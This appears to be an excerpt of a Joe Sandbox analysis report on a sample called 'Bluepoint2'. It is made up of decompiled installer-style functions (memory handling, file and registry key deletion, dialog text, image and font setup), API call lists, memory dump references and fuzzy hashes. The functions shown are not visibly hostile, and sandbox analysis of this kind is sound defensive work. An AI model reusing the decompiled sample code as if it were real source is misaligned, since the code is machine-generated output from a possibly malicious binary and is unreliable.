                                                                                                                                    0x00402997
                                                                                                                                    0x0040299a
                                                                                                                                    0x004029a0
                                                                                                                                    0x004029ae
                                                                                                                                    0x004029b3
                                                                                                                                    0x004029b7
                                                                                                                                    0x004029ba
                                                                                                                                    0x004029c3
                                                                                                                                    0x004029cf
                                                                                                                                    0x004029d3
                                                                                                                                    0x004029d6
                                                                                                                                    0x004029e0
                                                                                                                                    0x004029ff
                                                                                                                                    0x004029e7
                                                                                                                                    0x004029ec
                                                                                                                                    0x004029f4
                                                                                                                                    0x004029f7
                                                                                                                                    0x004029fc
                                                                                                                                    0x004029fc
                                                                                                                                    0x00402a06
                                                                                                                                    0x00402a06
                                                                                                                                    0x00402a13
                                                                                                                                    0x00402a19
                                                                                                                                    0x00402a1f
                                                                                                                                    0x00402a1f
                                                                                                                                    0x004029b7
                                                                                                                                    0x00402a33
                                                                                                                                    0x00402a35
                                                                                                                                    0x00402a35
                                                                                                                                    0x00402a3f
                                                                                                                                    0x00402a40
                                                                                                                                    0x00402a44
                                                                                                                                    0x00402a48
                                                                                                                                    0x00402a4e
                                                                                                                                    0x00402a4e
                                                                                                                                    0x00402a55
                                                                                                                                    0x004022f1
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00402c39

                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                    • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                                                                    • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                                                                    • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                                                                                    • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                    			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                                                                                                    0x00404e7a
                                                                                                                                    0x00404e7f
                                                                                                                                    0x00404e87
                                                                                                                                    0x00404e88
                                                                                                                                    0x00404e95
                                                                                                                                    0x00404e9d
                                                                                                                                    0x00404e9e
                                                                                                                                    0x00404ea0
                                                                                                                                    0x00404ea2
                                                                                                                                    0x00404ea4
                                                                                                                                    0x00404ea7
                                                                                                                                    0x00404ea7
                                                                                                                                    0x00404eae
                                                                                                                                    0x00404eb4
                                                                                                                                    0x00404eb4
                                                                                                                                    0x00404ebb
                                                                                                                                    0x00404ec2
                                                                                                                                    0x00404ec5
                                                                                                                                    0x00404ec8
                                                                                                                                    0x00404ec8
                                                                                                                                    0x00404ecc
                                                                                                                                    0x00404edc
                                                                                                                                    0x00404ede
                                                                                                                                    0x00404ee1
                                                                                                                                    0x00404e8a
                                                                                                                                    0x00404e8a
                                                                                                                                    0x00404e91
                                                                                                                                    0x00404e91
                                                                                                                                    0x00404ee9
                                                                                                                                    0x00404ef4
                                                                                                                                    0x00404f0a
                                                                                                                                    0x00404f1b
                                                                                                                                    0x00404f37

                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                                                    • wsprintfW.USER32 ref: 00404F1B
                                                                                                                                    • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s$H7B
                                                                                                                                    • API String ID: 3540041739-107966168
                                                                                                                                    • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                                                                    • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                                                                    • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                                                                                    • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 713C2480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			E713C2480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E713C135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E713C12E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M713C25F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E713C13B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E713C13B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x713c506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x713c506c, __eax,  *0x713c506c, 0, 0);
									goto L27;
								case 4:
									__eax = E713C12CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E713C13B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x713c506c =  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2 + 0x18;
									 *__ebx =  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2 + 0x18;
									asm("cdq");
									__eax = E713C1510(__edx,  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2 + 0x18, __edx,  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E713C12CC(0x713c5044);
					goto L10;
				}
			}











                                                                                                                                    0x713c2494
                                                                                                                                    0x713c2498
                                                                                                                                    0x713c24a3
                                                                                                                                    0x713c24a3
                                                                                                                                    0x713c24aa
                                                                                                                                    0x713c24af
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c24b3
                                                                                                                                    0x713c24b6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c24bb
                                                                                                                                    0x713c24c6
                                                                                                                                    0x713c24d6
                                                                                                                                    0x00000000
                                                                                                                                    0x713c24cd
                                                                                                                                    0x713c24cf
                                                                                                                                    0x713c24e5
                                                                                                                                    0x00000000
                                                                                                                                    0x713c24e5
                                                                                                                                    0x713c24bd
                                                                                                                                    0x713c24bd
                                                                                                                                    0x713c24e6
                                                                                                                                    0x713c24e6
                                                                                                                                    0x713c24e8
                                                                                                                                    0x713c24ec
                                                                                                                                    0x713c24ec
                                                                                                                                    0x713c24ef
                                                                                                                                    0x713c24ef
                                                                                                                                    0x713c24f7
                                                                                                                                    0x713c24ff
                                                                                                                                    0x713c2502
                                                                                                                                    0x713c25c1
                                                                                                                                    0x713c25c2
                                                                                                                                    0x713c25cd
                                                                                                                                    0x713c25f7
                                                                                                                                    0x713c25f7
                                                                                                                                    0x713c25dd
                                                                                                                                    0x713c25e9
                                                                                                                                    0x713c25df
                                                                                                                                    0x713c25df
                                                                                                                                    0x713c25df
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2508
                                                                                                                                    0x713c2508
                                                                                                                                    0x00000000
                                                                                                                                    0x713c250f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2517
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2525
                                                                                                                                    0x713c2527
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2548
                                                                                                                                    0x713c254e
                                                                                                                                    0x713c2551
                                                                                                                                    0x713c2553
                                                                                                                                    0x713c2563
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2530
                                                                                                                                    0x713c2535
                                                                                                                                    0x713c2538
                                                                                                                                    0x713c2539
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c256f
                                                                                                                                    0x713c2575
                                                                                                                                    0x713c2576
                                                                                                                                    0x713c2579
                                                                                                                                    0x713c257a
                                                                                                                                    0x713c257c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2588
                                                                                                                                    0x713c258b
                                                                                                                                    0x713c2597
                                                                                                                                    0x713c2599
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c25a5
                                                                                                                                    0x713c25b1
                                                                                                                                    0x713c25b4
                                                                                                                                    0x713c25b6
                                                                                                                                    0x713c25b9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2508
                                                                                                                                    0x713c2502
                                                                                                                                    0x713c24db
                                                                                                                                    0x713c24e0
                                                                                                                                    0x00000000
                                                                                                                                    0x713c24e0

                                                                                                                                    APIs
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 713C25C2
                                                                                                                                      • Part of subcall function 713C12CC: lstrcpynW.KERNEL32(00000000,?,713C137F,00000019,713C11CA,-000000A0), ref: 713C12DC
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 713C2548
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 713C2563
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84129670690.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84129620684.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129732994.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129781776.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_713c0000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4216380887-0
                                                                                                                                    • Opcode ID: b38d542cf78b84698811baa9d6bc4e18e871636371a1b5ecc08690f067d1f984
                                                                                                                                    • Instruction ID: 03f9bb21040c2685aecb1f0c1cd4c180926e5659b142ec7529748f9dbc05b3aa
                                                                                                                                    • Opcode Fuzzy Hash: b38d542cf78b84698811baa9d6bc4e18e871636371a1b5ecc08690f067d1f984
                                                                                                                                    • Instruction Fuzzy Hash: 65419EB110830ADFD715DF29D840E26B7BDFB58B18F10891EE847965C1EB30E949CB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                                                                    0x00402eb4
                                                                                                                                    0x00402ebd
                                                                                                                                    0x00402ec6
                                                                                                                                    0x00402ed2
                                                                                                                                    0x00402edb
                                                                                                                                    0x00402ee5
                                                                                                                                    0x00402f0a
                                                                                                                                    0x00402f10
                                                                                                                                    0x00402f15
                                                                                                                                    0x00402f16
                                                                                                                                    0x00402f46
                                                                                                                                    0x00402f1f
                                                                                                                                    0x00402f21
                                                                                                                                    0x00402f71
                                                                                                                                    0x00402f74
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f7a
                                                                                                                                    0x00402f30
                                                                                                                                    0x00402f35
                                                                                                                                    0x00402f37
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f3f
                                                                                                                                    0x00402f44
                                                                                                                                    0x00402f45
                                                                                                                                    0x00402f45
                                                                                                                                    0x00402f52
                                                                                                                                    0x00402f5a
                                                                                                                                    0x00402f61
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f8a
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f69
                                                                                                                                    0x00402ef5
                                                                                                                                    0x00402f08
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f08
                                                                                                                                    0x00402f90

                                                                                                                                    APIs
                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1354259210-0
                                                                                                                                    • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                                                                    • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                                                                    • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                                                                    • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                    			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                                                                    0x00401d81
                                                                                                                                    0x00401d85
                                                                                                                                    0x00401d9a
                                                                                                                                    0x00401d87
                                                                                                                                    0x00401d89
                                                                                                                                    0x00401d8f
                                                                                                                                    0x00401d8f
                                                                                                                                    0x00401da0
                                                                                                                                    0x00401da3
                                                                                                                                    0x00401dad
                                                                                                                                    0x00401db0
                                                                                                                                    0x00401db8
                                                                                                                                    0x00401dc9
                                                                                                                                    0x00401dcc
                                                                                                                                    0x00401dd7
                                                                                                                                    0x00401dce
                                                                                                                                    0x00401dd0
                                                                                                                                    0x00401dd0
                                                                                                                                    0x00401ddb
                                                                                                                                    0x00401de5
                                                                                                                                    0x00401e0c
                                                                                                                                    0x00401e1b
                                                                                                                                    0x00401e29
                                                                                                                                    0x00401e31
                                                                                                                                    0x00401e39
                                                                                                                                    0x00401e39
                                                                                                                                    0x00401e42
                                                                                                                                    0x00401e48
                                                                                                                                    0x00402ba4
                                                                                                                                    0x00402ba4
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00402c39

                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                                                    • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                                                                    • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                                                    • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                    			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                                                                    0x00401e4e
                                                                                                                                    0x00401e59
                                                                                                                                    0x00401e5b
                                                                                                                                    0x00401e68
                                                                                                                                    0x00401e7f
                                                                                                                                    0x00401e84
                                                                                                                                    0x00401e91
